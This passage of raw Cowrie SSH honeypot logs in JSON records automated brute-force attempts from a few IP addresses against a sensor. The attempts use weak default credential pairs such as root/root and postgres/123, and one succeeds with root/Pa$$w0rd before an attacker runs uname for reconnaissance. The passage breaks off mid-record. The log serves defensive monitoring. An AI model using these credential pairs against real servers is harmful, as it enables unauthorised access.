{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:32.135675Z","src_ip":"212.227.125.160","session":"25a969500180"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:32.344615Z","src_ip":"212.227.235.229","session":"a082d0ea854f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41972,"dst_ip":"1.2.3.4","dst_port":22,"session":"49d9beb15c37","protocol":"ssh","message":"New connection: 83.168.105.65:41972 (1.2.3.4:22) [session: 49d9beb15c37]","sensor":"my-vps","timestamp":"2025-08-26T11:31:35.035264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:35.037649Z","src_ip":"83.168.105.65","session":"49d9beb15c37"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:35.075249Z","src_ip":"83.168.105.65","session":"49d9beb15c37"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:31:35.231682Z","src_ip":"83.168.105.65","session":"49d9beb15c37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:31:35.379225Z","src_ip":"83.168.105.65","session":"49d9beb15c37"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:31:35.379897Z","src_ip":"83.168.105.65","session":"49d9beb15c37"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:35.420441Z","src_ip":"83.168.105.65","session":"49d9beb15c37"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:35.421486Z","src_ip":"83.168.105.65","session":"49d9beb15c37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42176,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e75a4a495b3","protocol":"ssh","message":"New connection: 212.227.125.160:42176 (1.2.3.4:22) [session: 8e75a4a495b3]","sensor":"my-vps","timestamp":"2025-08-26T11:31:36.361265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:36.404870Z","src_ip":"212.227.125.160","session":"8e75a4a495b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:36.453692Z","src_ip":"212.227.125.160","session":"8e75a4a495b3"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:36.728550Z","src_ip":"212.227.125.160","session":"8e75a4a495b3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:38.005676Z","src_ip":"212.227.125.160","session":"8e75a4a495b3"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":35258,"dst_ip":"1.2.3.4","dst_port":22,"session":"7afbac41e064","protocol":"ssh","message":"New connection: 196.251.86.249:35258 (1.2.3.4:22) [session: 7afbac41e064]","sensor":"my-vps","timestamp":"2025-08-26T11:31:42.472637Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42948,"dst_ip":"1.2.3.4","dst_port":22,"session":"13759771d8b4","protocol":"ssh","message":"New connection: 212.227.125.160:42948 (1.2.3.4:22) [session: 13759771d8b4]","sensor":"my-vps","timestamp":"2025-08-26T11:31:42.552720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:42.553690Z","src_ip":"212.227.125.160","session":"13759771d8b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:42.603542Z","src_ip":"212.227.125.160","session":"13759771d8b4"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:42.767526Z","src_ip":"212.227.125.160","session":"13759771d8b4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:43.219656Z","src_ip":"196.251.86.249","session":"7afbac41e064"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:31:43.220349Z","src_ip":"196.251.86.249","session":"7afbac41e064"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:43.818450Z","src_ip":"212.227.125.160","session":"13759771d8b4"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"q1w2e3","message":"login attempt [hadoop/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:45.214410Z","src_ip":"196.251.86.249","session":"7afbac41e064"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:46.730834Z","src_ip":"196.251.86.249","session":"7afbac41e064"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43718,"dst_ip":"1.2.3.4","dst_port":22,"session":"edf89d99ba1e","protocol":"ssh","message":"New connection: 212.227.125.160:43718 (1.2.3.4:22) [session: edf89d99ba1e]","sensor":"my-vps","timestamp":"2025-08-26T11:31:48.067674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:48.068331Z","src_ip":"212.227.125.160","session":"edf89d99ba1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:48.120423Z","src_ip":"212.227.125.160","session":"edf89d99ba1e"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123456","message":"login attempt [administrator/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:48.602217Z","src_ip":"212.227.125.160","session":"edf89d99ba1e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:49.662528Z","src_ip":"212.227.125.160","session":"edf89d99ba1e"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41314,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a2ee7e37086","protocol":"ssh","message":"New connection: 83.168.105.65:41314 (1.2.3.4:22) [session: 8a2ee7e37086]","sensor":"my-vps","timestamp":"2025-08-26T11:31:50.490136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:50.503062Z","src_ip":"83.168.105.65","session":"8a2ee7e37086"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:50.527392Z","src_ip":"83.168.105.65","session":"8a2ee7e37086"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:50.671297Z","src_ip":"83.168.105.65","session":"8a2ee7e37086"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:51.710573Z","src_ip":"83.168.105.65","session":"8a2ee7e37086"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44490,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec256eae5161","protocol":"ssh","message":"New connection: 212.227.125.160:44490 (1.2.3.4:22) [session: ec256eae5161]","sensor":"my-vps","timestamp":"2025-08-26T11:31:53.916080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:53.917380Z","src_ip":"212.227.125.160","session":"ec256eae5161"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:53.967620Z","src_ip":"212.227.125.160","session":"ec256eae5161"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:54.126548Z","src_ip":"212.227.125.160","session":"ec256eae5161"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:55.382993Z","src_ip":"212.227.125.160","session":"ec256eae5161"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45212,"dst_ip":"1.2.3.4","dst_port":22,"session":"922427a2aacd","protocol":"ssh","message":"New connection: 212.227.125.160:45212 (1.2.3.4:22) [session: 922427a2aacd]","sensor":"my-vps","timestamp":"2025-08-26T11:31:59.796110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:59.994163Z","src_ip":"212.227.125.160","session":"922427a2aacd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:59.994924Z","src_ip":"212.227.125.160","session":"922427a2aacd"}
{"eventid":"cowrie.login.failed","username":"neo4j","password":"neo4j","message":"login attempt [neo4j/neo4j] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:00.720555Z","src_ip":"212.227.125.160","session":"922427a2aacd"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:01.773443Z","src_ip":"212.227.125.160","session":"922427a2aacd"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":51996,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3db07118986","protocol":"ssh","message":"New connection: 83.168.105.65:51996 (1.2.3.4:22) [session: a3db07118986]","sensor":"my-vps","timestamp":"2025-08-26T11:32:05.642755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:05.643394Z","src_ip":"83.168.105.65","session":"a3db07118986"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:05.680467Z","src_ip":"83.168.105.65","session":"a3db07118986"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:05.790842Z","src_ip":"83.168.105.65","session":"a3db07118986"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46030,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cf0c2b9b048","protocol":"ssh","message":"New connection: 212.227.125.160:46030 (1.2.3.4:22) [session: 5cf0c2b9b048]","sensor":"my-vps","timestamp":"2025-08-26T11:32:06.214485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:06.215417Z","src_ip":"212.227.125.160","session":"5cf0c2b9b048"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v